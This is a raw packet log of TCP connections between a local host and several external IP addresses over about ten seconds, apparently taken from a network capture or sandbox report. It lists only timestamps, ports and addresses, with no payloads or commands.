                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:42.905688047 CET5020280192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:42.910510063 CET805020218.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:42.913711071 CET5020280192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:42.913844109 CET5020280192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:42.913887024 CET5020280192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:42.918716908 CET805020218.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:42.918728113 CET805020218.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:43.205590963 CET5020280192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:43.233309984 CET5020380192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:43.238208055 CET805020318.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:43.238279104 CET5020380192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:43.238464117 CET5020380192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:43.238518000 CET5020380192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:43.243249893 CET805020318.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:43.243279934 CET805020318.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:43.906948090 CET805020318.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:43.912092924 CET5020380192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:43.917448997 CET805020318.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:43.919718027 CET5020380192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:43.962886095 CET5020480192.168.2.847.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:43.968261003 CET805020447.129.31.212192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:43.968338966 CET5020480192.168.2.847.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:43.970973015 CET5020480192.168.2.847.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:43.970998049 CET5020480192.168.2.847.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:43.975848913 CET805020447.129.31.212192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:43.975861073 CET805020447.129.31.212192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:44.323693037 CET805020147.129.31.212192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:44.324048996 CET5020180192.168.2.847.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:44.329878092 CET805020147.129.31.212192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:44.329926968 CET5020180192.168.2.847.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:44.342546940 CET5020580192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:44.347562075 CET805020554.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:44.347700119 CET5020580192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:44.347809076 CET5020580192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:44.347839117 CET5020580192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:44.352659941 CET805020554.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:44.352684975 CET805020554.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:45.361429930 CET805020554.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:45.361592054 CET5020580192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:45.361612082 CET805020554.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:45.361623049 CET805020554.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:45.361692905 CET5020580192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:45.366379976 CET805020554.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:45.376045942 CET5020680192.168.2.83.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:45.380839109 CET80502063.94.10.34192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:45.380902052 CET5020680192.168.2.83.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:45.381017923 CET5020680192.168.2.83.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:45.381040096 CET5020680192.168.2.83.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:45.385889053 CET80502063.94.10.34192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:45.385900974 CET80502063.94.10.34192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:45.427607059 CET805020447.129.31.212192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:45.427813053 CET5020480192.168.2.847.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:45.433074951 CET805020447.129.31.212192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:45.433144093 CET5020480192.168.2.847.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:45.492721081 CET5020780192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:45.497622013 CET805020718.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:45.497713089 CET5020780192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:45.497843981 CET5020780192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:45.497869968 CET5020780192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:45.502688885 CET805020718.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:45.502700090 CET805020718.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:46.040590048 CET80502063.94.10.34192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:46.041955948 CET5020680192.168.2.83.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:46.047092915 CET80502063.94.10.34192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:46.047153950 CET5020680192.168.2.83.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:46.059436083 CET5020880192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:46.064306974 CET805020818.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:46.064373970 CET5020880192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:46.064702034 CET5020880192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:46.064724922 CET5020880192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:46.069550991 CET805020818.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:46.069561958 CET805020818.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:46.165306091 CET805020718.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:46.165868044 CET5020780192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:46.171124935 CET805020718.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:46.173894882 CET5020780192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:46.597382069 CET5020980192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:46.602356911 CET805020954.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:46.605546951 CET5020980192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:46.606090069 CET5020980192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:46.606137037 CET5020980192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:46.610905886 CET805020954.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:46.610918999 CET805020954.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:46.736860037 CET805020818.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:46.737000942 CET5020880192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:46.742031097 CET805020818.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:46.742094994 CET5020880192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:46.749917030 CET5021080192.168.2.818.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:46.754693031 CET805021018.246.231.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:46.754754066 CET5021080192.168.2.818.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:46.755074978 CET5021080192.168.2.818.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:46.755173922 CET5021080192.168.2.818.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:46.759780884 CET805021018.246.231.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:46.759890079 CET805021018.246.231.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:47.018148899 CET497277923192.168.2.862.60.190.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:47.023042917 CET79234972762.60.190.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:47.288526058 CET79234972762.60.190.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:47.290307045 CET497277923192.168.2.862.60.190.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:47.295152903 CET79234972762.60.190.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:47.454467058 CET805020954.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:47.454607964 CET5020980192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:47.460558891 CET805020954.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:47.460624933 CET5020980192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:47.517493963 CET5021180192.168.2.818.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:47.522278070 CET805021118.246.231.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:47.522344112 CET5021180192.168.2.818.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:47.522459984 CET5021180192.168.2.818.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:47.522475004 CET5021180192.168.2.818.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:47.527247906 CET805021118.246.231.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:47.527271986 CET805021118.246.231.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:47.578082085 CET805021018.246.231.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:47.580065966 CET5021080192.168.2.818.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:47.585216999 CET805021018.246.231.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:47.585279942 CET5021080192.168.2.818.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:47.596050024 CET5021280192.168.2.83.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:47.600909948 CET80502123.94.10.34192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:47.600986958 CET5021280192.168.2.83.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:47.601850033 CET5021280192.168.2.83.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:47.601862907 CET5021280192.168.2.83.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:47.606662989 CET80502123.94.10.34192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:47.606673002 CET80502123.94.10.34192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:48.278218031 CET80502123.94.10.34192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:48.283166885 CET5021280192.168.2.83.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:48.288258076 CET80502123.94.10.34192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:48.288350105 CET5021280192.168.2.83.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:48.304836988 CET5021380192.168.2.835.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:48.309869051 CET805021335.164.78.200192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:48.310328007 CET5021380192.168.2.835.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:48.310450077 CET5021380192.168.2.835.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:48.310543060 CET5021380192.168.2.835.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:48.315291882 CET805021335.164.78.200192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:48.315505028 CET805021335.164.78.200192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:48.358630896 CET805021118.246.231.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:48.359767914 CET5021180192.168.2.818.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:48.364984989 CET805021118.246.231.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:48.367593050 CET5021180192.168.2.818.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:48.661436081 CET5021480192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:48.666356087 CET805021418.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:48.666414976 CET5021480192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:48.666543007 CET5021480192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:48.666564941 CET5021480192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:48.671410084 CET805021418.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:48.671463966 CET805021418.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:49.154155970 CET805021335.164.78.200192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:49.154329062 CET5021380192.168.2.835.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:49.159650087 CET805021335.164.78.200192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:49.159734964 CET5021380192.168.2.835.164.78.200
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:49.169385910 CET5021580192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:49.174277067 CET805021518.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:49.174360991 CET5021580192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:49.175014973 CET5021580192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:49.175043106 CET5021580192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:49.179912090 CET805021518.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:49.180027008 CET805021518.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:49.838440895 CET805021518.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:49.839795113 CET5021580192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:49.845036030 CET805021518.208.156.248192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:49.845859051 CET5021580192.168.2.818.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:49.872622013 CET5021680192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:49.877511024 CET805021654.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:49.877593994 CET5021680192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:49.877718925 CET5021680192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:49.877743959 CET5021680192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:49.882610083 CET805021654.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:49.882639885 CET805021654.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:50.093806982 CET805021418.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:50.095813990 CET5021480192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:50.101229906 CET805021418.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:50.103704929 CET5021480192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:50.468838930 CET5021780192.168.2.847.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:50.473928928 CET805021747.129.31.212192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:50.474124908 CET5021780192.168.2.847.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:50.474240065 CET5021780192.168.2.847.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:50.474260092 CET5021780192.168.2.847.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:50.479031086 CET805021747.129.31.212192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:50.479093075 CET805021747.129.31.212192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:50.699146032 CET805021654.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:50.699471951 CET5021680192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:50.705295086 CET805021654.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:50.705362082 CET5021680192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:50.730509043 CET5021880192.168.2.818.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:50.735409975 CET805021818.246.231.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:50.735543013 CET5021880192.168.2.818.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:50.735658884 CET5021880192.168.2.818.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:50.735680103 CET5021880192.168.2.818.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:50.741075039 CET805021818.246.231.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:50.741106033 CET805021818.246.231.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:51.568301916 CET805021818.246.231.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:51.572921038 CET5021880192.168.2.818.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:51.578233957 CET805021818.246.231.120192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:51.578425884 CET5021880192.168.2.818.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:51.653557062 CET5021980192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:51.658755064 CET805021954.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:51.658829927 CET5021980192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:51.658977032 CET5021980192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:51.658999920 CET5021980192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:51.663849115 CET805021954.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:51.664102077 CET805021954.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:51.944933891 CET805021747.129.31.212192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:51.945179939 CET5021780192.168.2.847.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:51.950417042 CET805021747.129.31.212192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:51.950644970 CET5021780192.168.2.847.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:52.147093058 CET5022080192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:52.152055979 CET805022044.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:52.155728102 CET5022080192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:52.155874014 CET5022080192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:52.155893087 CET5022080192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:52.160777092 CET805022044.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:52.160809040 CET805022044.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:52.485285044 CET805021954.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:52.485443115 CET5021980192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:52.491422892 CET805021954.244.188.177192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:52.491472960 CET5021980192.168.2.854.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:52.503602982 CET5022180192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:52.508563042 CET805022118.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:52.508627892 CET5022180192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:52.508774996 CET5022180192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:52.508862019 CET5022180192.168.2.818.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:52.513752937 CET805022118.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:52.513767958 CET805022118.141.10.107192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:52.825691938 CET805022044.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:52.825855970 CET5022080192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:52.831244946 CET805022044.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:52.831295967 CET5022080192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:52.840333939 CET5022280192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:52.845413923 CET805022244.221.84.105192.168.2.8
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:52.845487118 CET5022280192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:52.845649958 CET5022280192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:52.845664978 CET5022280192.168.2.844.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:25:52.850599051 CET805022244.221.84.105192.168.2.8
